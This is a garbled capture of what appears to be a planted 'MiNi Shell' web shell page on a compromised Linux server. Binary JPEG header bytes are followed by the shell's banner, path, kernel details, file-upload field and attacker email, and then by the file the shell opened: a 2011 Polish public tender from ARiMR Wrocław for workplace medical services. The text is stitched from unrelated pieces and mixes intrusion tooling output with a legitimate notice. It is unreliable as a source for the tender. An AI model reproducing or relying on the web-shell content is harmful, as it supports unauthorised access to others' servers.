JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110207/17940-N-2011.html

<p class="kh_header"><b>Wrocław: świadczenie usług medycznych z zakresu medycyny pracy dla pracowników Dolnośląskiego Oddziału Regionalnego oraz 26 Biur Powiatowych</b><br>
<b>Numer ogłoszenia: 17940 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 071 3697400, faks 071 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług medycznych z zakresu medycyny pracy dla pracowników Dolnośląskiego Oddziału Regionalnego oraz 26 Biur Powiatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są badania profilaktyczne (wstępne, kontrolne i okresowe) pracowników 
i stażystów Dolnośląskiego Oddziału Regionalnego oraz 26 Biur Powiatowych ARiMR. 
Po przeprowadzonym badaniu lekarz medycyny pracy zobowiązany jest wydać pracownikowi 
i pracodawcy orzeczenie lekarskie dla celów określonych w Kodeksie pracy. Opis stanowisk oraz warunków pracy pracowników Zamawiającego podlegających badaniom stanowi załącznik nr 3 do SIWZ.

Liczba przewidywanych badań wg grup pracowników:
	Biuro Kontroli na Miejscu	Kierownicy	Pozostali
Wstępne	15	10	50
Okresowe	22	26	165
Kontrolne	5	5	57


2. Przedmiotem zamówienia są także dodatkowe badania okulistyczne pracowników Dolnośląskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR przeprowadzone z uwagi na ich pogarszający się wzrok. Przewidywana ilość pracowników podlegających w/w badaniu wynosi ok. 30 osób. Po przeprowadzonym badaniu lekarz medycyny pracy zobowiązany jest wydać pracownikowi i pracodawcy orzeczenie lekarskie dla celów określonych w Kodeksie pracy.

3. Przedmiotem zamówienia jest również zobowiązanie lekarza sprawującego profilaktyczną opiekę zdrowotną nad pracownikami, do uczestnictwa w charakterze członka w pracach komisji BHP (raz na kwartał), powołanej przez Zamawiającego. W tym zakresie lekarz zobowiązany jest do wykonywania następujących zadań:
- dokonywanie przeglądu stanowisk pracy,
- opiniowanie podejmowanych przez Zamawiającego środków zapobiegających wypadkom przy pracy 
i chorobom zawodowym,
- formułowanie wniosków dotyczących poprawy warunków pracy, 
- współdziałanie z Zamawiającym w realizacji jego obowiązków w zakresie bezpieczeństwa i higieny pracy.
    Udział w pracach komisji jest obligatoryjny.

4. Ponadto przedmiotem zamówienia jest dokonywanie przez lekarza sprawującego profilaktyczną opiekę zdrowotną nad pracownikami przeglądu warunków pracy, w tym przeprowadzenie wizytacji stanowisk pracy pracowników biurowych. Przeglądy będą się odbywały wraz z pracownikiem Zamawiającego odpowiedzialnym w zakresie bhp, przy czym koszt transportu do wskazanych lokalizacji ponosi Zamawiający. Lokalizację oraz ilość biur, w których należy przeprowadzić w/w zadania przedstawia poniższa tabela: 

Lp.	Biuro Powiatowe	Adres
1	Bolesławiec	59-700 Bolesławiec, ul. Komuny Paryskiej 38
2	Dzierżoniów	58-200 Dzierżoniów, Batalionów Chłopskich 19
3	Głogów	67-200 Głogów, ul. Sikorskiego 40
4	Góra	56 - 200 Góra, ul. Armii Polskiej 8
5	Jawor	59-400 Jawor, ul. Starojaworska 91
6	Jelenia Góra	58 - 500 Jelenia Góra, ul. Marcinka 33 a
7	Kamienna Góra	58 - 400 Kamienna Góra, ul. H. Sienkiewicza 6 a
8	Kłodzko	57-300 Kłodzko, ul. Harcerzy 6
9	Legnica	59-220 Legnica, ul. Bydgoska 18
10	Lubań	59-800 Lubań, ul. Karola Miarki 1
11	Lubin	59-300 Lubin ul. Komisji Edukacji Narodowej 6
12	Lwówek z/s w Uboczu	59-620 Gryfów Śl., Ubocze 300
13	Milicz z/s w Sławoszowicach	56-300 Sławoszowice, ul. Kolejowa 28, bud. B
14	Oleśnica z/s w Sycowie	56-500 Syców, ul. Ogrodowa 10
15	Oława	55-200 Oława ul. Nowodojazdowa 9
16	Polkowice	59-100 Polkowice, ul. Spółdzielcza 2
17	Strzelin	57-100 Strzelin, ul. Kamienna 10
18	Środa Śląska	55- 300 Środa Śląska, ul. Wawrzyńca Korwina 2
19	Świdnica	58-100 Świdnica, ul. Saperów 25 b
20	Trzebnica	55-100 Trzebnica, ul. Milicka 23
21	Wałbrzych	58-306 Wałbrzych, ul. Uczniowska 21
22	Wołów	56-100 Wołów ul. Zaułek Zielony 20
23	Wrocław	50 - 452 Wrocław, ul. Komuny Paryskiej 72
24	Ząbkowice Śl.	57-200 Ząbkowice Śl., ul. Staszica 18
25	Zgorzelec	59-900 Zgorzelec ul. Bohaterów II Armii WP 8
26	Złotoryja z/s w Pielgrzymce	59-524, Pielgrzymka 109a/1
27	Oddział Regionalny	52-438 Wrocław, ul. Giełdowa 8

5.  Przedmiotem zamówienia są również szczepienia ochronne - p/tężcowe, p/kleszczowe, badanie na wykrycie boleriozy - dla  ok. 30 pracowników Biura Kontroli na Miejscu oraz badania sanitarno-epidemiologiczne razem 
z badaniem kału na nosicielstwo dla ok. 20 pracowników Zamawiającego. 

6. Przedmiot zamówienia obejmuje również wykonanie psychotestów dla ok. 15 pracowników Zamawiającego.

7. Wykonawca musi posiadać konieczne doświadczenie i profesjonalne kwalifikacje niezbędne do prawidłowego wykonania zamówienia i zobowiązuje się do wykonania umowy przy dochowaniu należytej staranności określonej w art. 355 § 2 Kodeksu Cywilnego przy udziale lekarzy spełniających szczególne wymagania kwalifikacyjne do prowadzenia badań profilaktycznych oraz profilaktycznej opieki zdrowotnej niezbędnej do oceny warunków pracy, wynikających z przepisów prawnych.

8. Warunki dodatkowe:
1.	Przychodnia medycyny pracy, w której odbywać się będą badania musi znajdować się na terenie miasta  Wrocław oraz w co najmniej jednej miejscowości z niżej wymienionych grup:
- Ząbkowice i/lub Kłodzko
- Świdnica i/lub Wałbrzych,
- Jelenia Góra i/lub Legnica
- Głogów i/lub Góra
- Zgorzelec i/lub Lubań i/lub Bolesławiec
2.	Zamawiający zastrzega sobie możliwość korzystania z usług medycznych w dowolnym, zaproponowanym  przez Wykonawcę zakładzie wg potrzeb Zamawiającego. Wykaz zakładów opieki zdrowotnej, w których będą świadczone usługi medyczne dla Zamawiającego, wraz z numerami telefonów do rejestracji stanowi załącznik nr 3 do umowy.
3.	Zamawiający bezwzględnie wymaga aby wszystkie badania wraz z wydaniem orzeczenia przez lekarza medycyny pracy wykonane były w ciągu jednego dnia.
4.	Usługi medyczne będące przedmiotem zamówienia wraz ze szczepieniami ochronnymi, badaniami sanitarno-epidemiologicznymi i psychotestami, będą świadczone w dni powszednie tj. od poniedziałku do piątku, poza dniami ustawowo wolnymi od pracy. 
5.	Wykonawca zapewnia możliwość wcześniejszej, telefonicznej rejestracji pracowników w wyznaczonych godzinach w celu sprawnej realizacji przedmiotu zamówienia i zobowiązuje się dokonać bezzwłocznej rejestracji osoby skierowanej na badania po jej telefonicznym zgłoszeniu.
6.	Badania wstępne Wykonawca zobowiązuje się przeprowadzić po telefonicznej rejestracji dokonanej przez pracownika Zamawiającego, w terminie ustalonym podczas rejestracji, z zastrzeżeniem, że badanie zostanie przeprowadzone najpóźniej w ciągu pięciu dni roboczych od dnia telefonicznej rejestracji pracownika lub zgłoszenia osobistego w przychodni.
7.	Badania okresowe Wykonawca zobowiązuje się przeprowadzić po telefonicznej rejestracji dokonanej przez pracownika Zamawiającego, w terminie ustalonym podczas rejestracji, z zastrzeżeniem, że badanie zostanie przeprowadzone najpóźniej w ciągu pięciu dni roboczych od dnia telefonicznej rejestracji pracownika lub po zgłoszeniu osobistym w przychodni.
8.	Badania kontrolne Wykonawca zobowiązuje się przeprowadzić w dniu zgłoszenia się pracownika na badania, po wcześniejszej telefonicznej informacji przekazanej Wykonawcy przez upoważnionego pracownika Zamawiającego.
9.	Orzeczenia lekarskie (oryginał i kopia) dla celów określonych w Kodeksie pracy będą przekazywane przez Wykonawcę bezpośrednio po zakończeniu badania pracownikowi. Kopie tych zaświadczeń wraz z wynikami badań pracownicy Zamawiającego będą odbierać osobiście w dniu wykonania badania.
10.	Po przeprowadzonym badaniu przez lekarza okulistę i wystawieniu recepty (w przypadku występowania wady wzroku) lekarz medycyny pracy zobowiązany jest do wpisu na zaświadczeniu lekarskim stwierdzającym brak przeciwwskazań do wykonywania zadań służbowych informację:
        konieczne używanie okularów korekcyjnych podczas pracy z monitorem ekranowym - w przypadku, jeśli badanie okulistyczne w ramach badań profilaktycznych wykaże potrzebę używania okularów korekcyjnych podczas pracy z komputerem, lub
       konieczna zmiana szkieł korekcyjnych do pracy z monitorem ekranowym- w przypadku zmiany wady wzroku od ostatniego badania.
11.	Zamawiający powiadomi pisemnie Wykonawcę o planowanym terminie posiedzenia Komisji BHP z co najmniej 14 - dniowym wyprzedzeniem.
12.	Wykonawca zobowiązany jest powiadomić pisemnie Zamawiającego o przeprowadzonym przeglądzie w terminie 14 dni od dnia jego ukończenia.

Wymaga się, aby Wykonawca uzyskał na swoją odpowiedzialność i ryzyko oraz na koszt własny wszelkie istotne informacje, które mogą być niezbędne do przygotowania oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
2.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
3.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
4.	omyłek pisarskich lub błędów rachunkowych,
5.	mających na celu wyjaśnienie wątpliwości dotyczących treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
6.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
7.	innych zmian korzystnych dla Zamawiającego, w tym polegających na zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Oddział Regionalny ARiMR, 52-438 Wrocław, ul. Giełdowa 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2011 godzina 10:00, miejsce: Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com